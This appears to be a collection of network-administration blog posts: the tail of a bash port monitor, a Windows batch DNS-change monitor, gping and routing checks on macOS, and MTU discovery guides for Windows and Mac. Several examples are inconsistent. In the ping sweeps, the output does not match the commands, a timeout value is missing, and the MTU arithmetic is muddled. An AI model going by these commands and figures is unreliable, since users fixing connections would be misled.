foreign_addr=$(echo "$line" | awk '{print $5}')
printf "%-6s %-30s %-30s %-12s\n" "$proto" "$local_addr" "$foreign_addr" "-"
done
# Also check for any established connections using lsof
echo
echo "Active connections with processes:"
echo "--------------------------------------------------------------------------------------------"
lsof -i :$PORT -P -n 2>/dev/null | grep -v LISTEN | tail -n +2 | while read line; do
if [ -n "$line" ]; then
echo "$line"
fi
done
else
echo "No processes found using port $PORT"
echo
# Check if the port might be in use but not showing up in lsof
local netstat_result=$(netstat -anv | grep -E "\.$PORT ")
if [ -n "$netstat_result" ]; then
echo "However, netstat shows activity on port $PORT:"
echo "$netstat_result"
fi
fi
echo
echo "Refreshing in 20 seconds... (Press Ctrl+C to exit)"
}
# Trap Ctrl+C to exit gracefully
trap 'echo -e "\n\nExiting port monitor..."; exit 0' INT
# Main loop - refresh every 20 seconds
while true; do
show_port_usage
sleep 20
done

Windows Server: Polling critical DNS entries for any changes or errors

If you have tier 1 services that are dependant on a few DNS records, then you may want a simple batch job to monitor these dns records for changes or deletion.

The script below contains an example list of DNS entries (replace these records for the ones you want to monitor).

@echo off
setlocal enabledelayedexpansion
REM ============================================================================
REM DNS Monitor Script for Windows Server
REM Purpose: Monitor DNS entries for changes every 15 minutes
REM Author: Andrew Baker
REM Version: 1.0
REM Date: August 13, 2018
REM ============================================================================
REM Configuration Variables
set "LOG_FILE=dns_monitor.log"
set "PREVIOUS_FILE=dns_previous.tmp"
set "CURRENT_FILE=dns_current.tmp"
set "CHECK_INTERVAL=900"
REM DNS Entries to Monitor (Comma Separated List)
REM Add or modify domains as needed
set "DNS_LIST=google.com,microsoft.com,github.com,stackoverflow.com,amazon.com,facebook.com,twitter.com,linkedin.com,youtube.com,cloudflare.com"
REM Initialize log file with header if it doesn't exist
if not exist "%LOG_FILE%" (
echo DNS Monitor Log - Started on %DATE% %TIME% > "%LOG_FILE%"
echo ============================================================================ >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
)
:MAIN_LOOP
echo [%DATE% %TIME%] Starting DNS monitoring cycle...
echo [%DATE% %TIME%] INFO: Starting DNS monitoring cycle >> "%LOG_FILE%"
REM Clear current results file
if exist "%CURRENT_FILE%" del "%CURRENT_FILE%"
REM Process each DNS entry
for %%d in (%DNS_LIST%) do (
call :CHECK_DNS "%%d"
)
REM Compare with previous results if they exist
if exist "%PREVIOUS_FILE%" (
call :COMPARE_RESULTS
) else (
echo [%DATE% %TIME%] INFO: First run - establishing baseline >> "%LOG_FILE%"
)
REM Copy current results to previous for next comparison
copy "%CURRENT_FILE%" "%PREVIOUS_FILE%" >nul 2>&1
echo [%DATE% %TIME%] DNS monitoring cycle completed. Next check in 15 minutes...
echo [%DATE% %TIME%] INFO: DNS monitoring cycle completed >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
REM Wait 15 minutes (900 seconds) before next check
timeout /t %CHECK_INTERVAL% /nobreak >nul
goto MAIN_LOOP
REM ============================================================================
REM Function: CHECK_DNS
REM Purpose: Resolve DNS entry and log results
REM Parameter: %1 = Domain name to check
REM ============================================================================
:CHECK_DNS
set "DOMAIN=%~1"
echo Checking DNS for: %DOMAIN%
REM Perform nslookup and capture results
nslookup "%DOMAIN%" > temp_dns.txt 2>&1
REM Check if nslookup was successful
if %ERRORLEVEL% equ 0 (
REM Extract IP addresses from nslookup output
for /f "tokens=2" %%i in ('findstr /c:"Address:" temp_dns.txt ^| findstr /v "#53"') do (
set "IP_ADDRESS=%%i"
echo %DOMAIN%,!IP_ADDRESS! >> "%CURRENT_FILE%"
echo [%DATE% %TIME%] INFO: %DOMAIN% resolves to !IP_ADDRESS! >> "%LOG_FILE%"
)
REM Handle case where no IP addresses were found in successful lookup
findstr /c:"Address:" temp_dns.txt | findstr /v "#53" >nul
if !ERRORLEVEL! neq 0 (
echo %DOMAIN%,RESOLUTION_ERROR >> "%CURRENT_FILE%"
echo [%DATE% %TIME%] ERROR: %DOMAIN% - No IP addresses found in DNS response >> "%LOG_FILE%"
type temp_dns.txt >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
)
) else (
REM DNS resolution failed
echo %DOMAIN%,DNS_FAILURE >> "%CURRENT_FILE%"
echo [%DATE% %TIME%] ERROR: %DOMAIN% - DNS resolution failed >> "%LOG_FILE%"
type temp_dns.txt >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
)
REM Clean up temporary file
if exist temp_dns.txt del temp_dns.txt
goto :EOF
REM ============================================================================
REM Function: COMPARE_RESULTS
REM Purpose: Compare current DNS results with previous results
REM ============================================================================
:COMPARE_RESULTS
echo Comparing DNS results for changes...
REM Read previous results into memory
if exist "%PREVIOUS_FILE%" (
for /f "tokens=1,2 delims=," %%a in (%PREVIOUS_FILE%) do (
set "PREV_%%a=%%b"
)
)
REM Compare current results with previous
for /f "tokens=1,2 delims=," %%a in (%CURRENT_FILE%) do (
set "CURRENT_DOMAIN=%%a"
set "CURRENT_IP=%%b"
REM Get previous IP for this domain
set "PREVIOUS_IP=!PREV_%%a!"
if "!PREVIOUS_IP!"=="" (
REM New domain added
echo [%DATE% %TIME%] INFO: New domain added to monitoring: !CURRENT_DOMAIN! = !CURRENT_IP! >> "%LOG_FILE%"
) else if "!PREVIOUS_IP!" neq "!CURRENT_IP!" (
REM DNS change detected
echo [%DATE% %TIME%] WARNING: DNS change detected for !CURRENT_DOMAIN! >> "%LOG_FILE%"
echo [%DATE% %TIME%] WARNING: Previous IP: !PREVIOUS_IP! >> "%LOG_FILE%"
echo [%DATE% %TIME%] WARNING: Current IP:  !CURRENT_IP! >> "%LOG_FILE%"
echo [%DATE% %TIME%] WARNING: *** INVESTIGATE DNS CHANGE *** >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
REM Also display warning on console
echo.
echo *** WARNING: DNS CHANGE DETECTED ***
echo Domain: !CURRENT_DOMAIN!
echo Previous: !PREVIOUS_IP!
echo Current:  !CURRENT_IP!
echo Check log file for details: %LOG_FILE%
echo.
)
)
REM Check for domains that disappeared from current results
for /f "tokens=1,2 delims=," %%a in (%PREVIOUS_FILE%) do (
set "CHECK_DOMAIN=%%a"
set "FOUND=0"
for /f "tokens=1 delims=," %%c in (%CURRENT_FILE%) do (
if "%%c"=="!CHECK_DOMAIN!" set "FOUND=1"
)
if "!FOUND!"=="0" (
echo [%DATE% %TIME%] WARNING: Domain !CHECK_DOMAIN! no longer resolving or removed from monitoring >> "%LOG_FILE%"
)
)
goto :EOF
REM ============================================================================
REM End of Script
REM ============================================================================

Macbook OSX: Using gping over a Zero Trust Network Client (like Zscaler)

Once you start using a zero trust network, the first causality is normally the Ping command. The gping (Graphical Ping) command line displays a color coded realtime graph of continuous pings to a specified host and it supports specifying alternate interfaces/gateways.

First lets find which interface to use. The “arp -a” command is used to display the ARP cache on a computer, including both dynamic and static entries. This command is similar to the arp command without any options, but it also displays the status of the entries in the cache.

$ arp -a
unfisecuregateway (192.168.0.1) at 74:83:c2:d0:c8:cd on en0 ifscope [ethernet]
amazon-ce482021d.localdomain (192.168.0.66) at 8:7c:39:e3:de:af on en0 ifscope [ethernet]
km98e898.localdomain (192.168.0.117) at 0:17:c8:87:5a:f7 on en0 ifscope [ethernet]
? (192.168.0.210) at 9c:14:63:5c:aa:de on en0 ifscope [ethernet]
? (192.168.0.211) at 9c:14:63:5c:aa:ac on en0 ifscope [ethernet]
? (192.168.0.212) at 9c:14:63:5c:aa:e1 on en0 ifscope [ethernet]
? (192.168.0.213) at 9c:14:63:5c:ab:20 on en0 ifscope [ethernet]
? (192.168.0.214) at 9c:14:63:5c:aa:9 on en0 ifscope [ethernet]
? (192.168.0.215) at 9c:14:63:5c:aa:74 on en0 ifscope [ethernet]
? (192.168.0.216) at 9c:14:63:5c:ab:64 on en0 ifscope [ethernet]
? (192.168.0.217) at 9c:14:63:2d:23:5f on en0 ifscope [ethernet]
? (192.168.0.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
? (224.0.0.251) at 1:0:5e:0:0:fb on en0 ifscope permanent [ethernet]
? (239.255.255.250) at 1:0:5e:7f:ff:fa on en0 ifscope permanent [ethernet]

You will see I have an en0 interface. Lets try an gping via the en0 interface:

$ brew install gping
$ gping -i en0 google.com
google.com (172.217.170.110)             last 27.274ms min 26.945ms  max 134.849ms avg 41.896ms  jtr 2.916ms   p95 107.494ms t/o 0
130.606ms│
│
│                   ⢀
│                   ⢸
│                   ⢸
112.88ms │                   ⢸
│                   ⣼
│                   ⣿
│        ⡆          ⣿
95.154ms │   ⢀    ⡇          ⣿
│   ⢸    ⡇          ⣿
│   ⢸    ⡇          ⣿
│   ⢸   ⢠⡇          ⣿          ⢀
77.428ms │   ⣼   ⢸⡇      ⡆   ⣿          ⢸
│   ⣿   ⢸⡇      ⡇  ⢸ ⡇         ⢸
│   ⣿   ⢸⡇     ⢰⡇⢀ ⢸ ⡇         ⢸
│   ⣿   ⢸⢇     ⢸⡇⢸ ⢸ ⡇         ⡇⡇
59.702ms │   ⡟⡄  ⢸⢸     ⢸⢇⣼ ⢸ ⡇         ⡇⡇
│   ⡇⡇  ⢸⢸     ⡸⢸⡏⡆⢸ ⡇         ⡇⡇
│   ⡇⡇  ⢸⢸     ⡇⢸⡇⡇⢸ ⡇     ⡆   ⡇⡇
│   ⡇⡇  ⢸⢸ ⢰   ⡇⢸⠃⡇⢸ ⡇    ⢀⢇   ⡇⡇
41.976ms │  ⢸ ⡇  ⡇⢸ ⣼  ⢀⠇⢸ ⡇⡎ ⡇⡆   ⢸⢸   ⡇⡇
│  ⢸ ⡇  ⡇⢸ ⡿⡀ ⢸   ⢇⡇ ⣷⡇   ⢸⢸  ⢸ ⢸
│  ⢸ ⡇  ⡇⢸ ⡇⣇⢆⡸   ⢸⡇ ⣿⢱   ⡸⠸⡀⢠⢸ ⢸
│⣀ ⡸ ⡇  ⡇⢸⢸ ⡿⠈⠇   ⢸⡇ ⡇⢸ ⢀⡀⡇ ⡇⡜⢿ ⢸
24.25ms  │ ⠉  ⠉⠉⠉⠁⠈⠉ ⠁     ⠈   ⠈⠉⠁⠈⠁ ⠉⠁⠈ ⠈⠁
└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
11:39:10                                                             11:39:25                                                    11:39:40

Mac OSX : Tracing which network interface will be used to route traffic to an IP/DNS address

If you have multiple connections on your device (and maybe you have a zero trust client installed); how do you find out which network interface on your device will be used to route the traffic?

Below is a route get request for googles DNS service:

$ route get 8.8.8.8
route to: dns.google
destination: dns.google
gateway: 100.64.0.1
interface: utun3
flags: <UP,GATEWAY,HOST,DONE,WASCLONED,IFSCOPE,IFREF>
recvpipe  sendpipe  ssthresh  rtt,msec    rttvar  hopcount      mtu     expire
0         0         0         0         0         0      1400         0

If you have multiple interfaces enabled, then the first item in the Service Order will be used. If you want to see the default interface for your device:

$ route -n get 0.0.0.0 | grep interface
interface: en0

Lets go an see whats going on in my default interface:

$ netstat utun3 | grep ESTABLISHED
tcp4       0      0  100.64.0.1.65271       jnb02s11-in-f4.1.https ESTABLISHED
tcp4       0      0  100.64.0.1.65269       jnb02s02-in-f14..https ESTABLISHED
tcp4       0      0  100.64.0.1.65262       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65261       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65260       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65259       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65258       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65257       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65256       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65255       192.0.73.2.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65254       192.0.78.23.https      ESTABLISHED
tcp4       0      0  100.64.0.1.65253       192.0.76.3.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65252       192.0.78.23.https      ESTABLISHED
tcp4       0      0  100.64.0.1.65251       192.0.76.3.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65250       192.0.78.23.https      ESTABLISHED
tcp4       0      0  100.64.0.1.65249       192.0.76.3.https       ESTABLISHED
tcp4       0      0  100.64.0.1.65248       ec2-13-244-140-3.https ESTABLISHED
tcp4       0      0  100.64.0.1.65247       192.0.73.2.https       ESTABLISHED

Finding and Setting the Maximum Transmission Unit (MTU) on a Windows Machine

If you have just changed ISPs or moved house and your internet suddenly starts misbehaving the likelihood is your Maximum Transmission Unit (MTU) is set too high for your ISP. The default internet facing MTU is 1500 bytes, BUT depending on your setup, this often needs to be set much lower.

Step 1:

First check your current MTU across all your ipv4 interfaces using netsh:

netsh interface ipv4 show subinterfaces
MTU  MediaSenseState   Bytes In  Bytes Out  Interface
------  ---------------  ---------  ---------  -------------
4294967295                1          0          0  Loopback Pseudo-Interface 1
1492                1        675        523  Local Area Connection

As you can see, the Local Area Connection interface is set to a 1492 bytes MTU. So how do we find out what it should be? We are going to send a fixed size Echo packet out, and tell the network not to fragment this packet. If somewhere along the line this packet is too big then this request will fail.

Next enter (if it fails then you know your MTU is too high):

ping 8.8.8.8 -f -l 1492

Procedure to find optimal MTU:

For PPPoE, your Max MTU should be no more than 1492 to allow space for the 8 byte PPPoE “wrapper”. 1492 + 8 = 1500. The ping test we will be doing does not include the IP/ICMP header of 28 bytes. 1500 – 28 = 1472. Include the 8 byte PPPoE wrapper if your ISP uses PPPoE and you get 1500 – 28 – 8 = 1464.

The best value for MTU is that value just before your packets get fragmented. Add 28 to the largest packet size that does not result in fragmenting the packets (since the ping command specifies the ping packet size, not including the IP/ICMP header of 28 bytes), and this is your Max MTU setting.

The below is an automated ping sweep, that tests various packet sizes until it fails (increasing in 10 bytes per iteration):

C:\Windows\system32>for /l %i in (1360,10,1500) do @ping -n 1 -w 8.8.8.8 -l %i -f
Pinging 8.8.8.8. with 1400 bytes of data:
Reply from 8.8.8.8: bytes=1400 time=6ms TTL=64
Ping statistics for 8.8.8.8:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 6ms, Maximum = 6ms, Average = 6ms
Pinging 8.8.8.8 with 1401 bytes of data:
Reply from 8.8.8.8: bytes=1401 time<1ms TTL=64
Ping statistics for 8.8.8.8:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Pinging 8.8.8.8 with 1402 bytes of data:
Reply from 8.8.8.8: bytes=1402 time<1ms TTL=64
Ping statistics for 8.8.8.8:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Pinging 8.8.8.8 with 1403 bytes of data:
Reply from 8.8.8.8: bytes=1403 time<1ms TTL=64
Ping statistics for 8.8.8.8:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms 

Once you find the MTU, you can set it as per below:

set subinterface “Local Area Connection” mtu=1360 store=persistent

Finding and Setting the Maximum Transmission Unit (MTU) on Mac/OSX

If you have just changed ISPs or moved house and your internet suddenly starts misbehaving the likelihood is your Maximum Transmission Unit (MTU) is set too high for your ISP. The default internet facing MTU is 1500 bytes, BUT depending on your setup, this often needs to be set much lower.

Step 1:

First check your current MTU.

$ networksetup -getMTU en0
Active MTU: 1500 (Current Setting: 1500)

As you can see, the Mac is set to 1500 bytes MTU. So how do we find out what it should be? We are going to send a fixed size Echo packet out, and tell the network not to fragment this packet. If somewhere along the line this packet is too big then this request will fail.

Next enter:

$ ping -D -s 1500 www.google.com
PING www.google.com (172.217.170.100): 1500 data bytes
ping: sendto: Message too long
ping: sendto: Message too long
Request timeout for icmp_seq 0
ping: sendto: Message too long
Request timeout for icmp_seq 1
ping: sendto: Message too long

Ok, so our MTU is too high.

Procedure to find optimal MTU:

Hint: For PPPoE, your Max MTU should be no more than 1492 to allow space for the 8 byte PPPoE “wrapper”. 1492 + 8 = 1500. The ping test we will be doing does not include the IP/ICMP header of 28 bytes. 1500 – 28 = 1472. Include the 8 byte PPPoE wrapper if your ISP uses PPPoE and you get 1500 – 28 – 8 = 1464.

The best value for MTU is that value just before your packets get fragmented. Add 28 to the largest packet size that does not result in fragmenting the packets (since the ping command specifies the ping packet size, not including the IP/ICMP header of 28 bytes), and this is your Max MTU setting.

The below is an automated ping sweep, that tests various packet sizes until it fails (increasing in 10 bytes per iteration):

$ ping -g 1300 -G 1600 -h 10 -D www.google.com
PING www.google.com (172.217.170.100): (1300 ... 1600) data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
Request timeout for icmp_seq 3
Request timeout for icmp_seq 4
Request timeout for icmp_seq 5
Request timeout for icmp_seq 6
ping: sendto: Message too long
Request timeout for icmp_seq 7

As you can see it failed on the 7th attempt (giving you a 1300 + 60 MTU).

Once you find the MTU, you can set it as per below:

$ ping -D -s 1360 www.google.com
PING www.google.com (172.217.170.100): 1370 data bytes
Request timeout for icmp_seq 0

So I can set my MTU as 1360 + 28 = 1386:

networksetup -setMTU en0 1386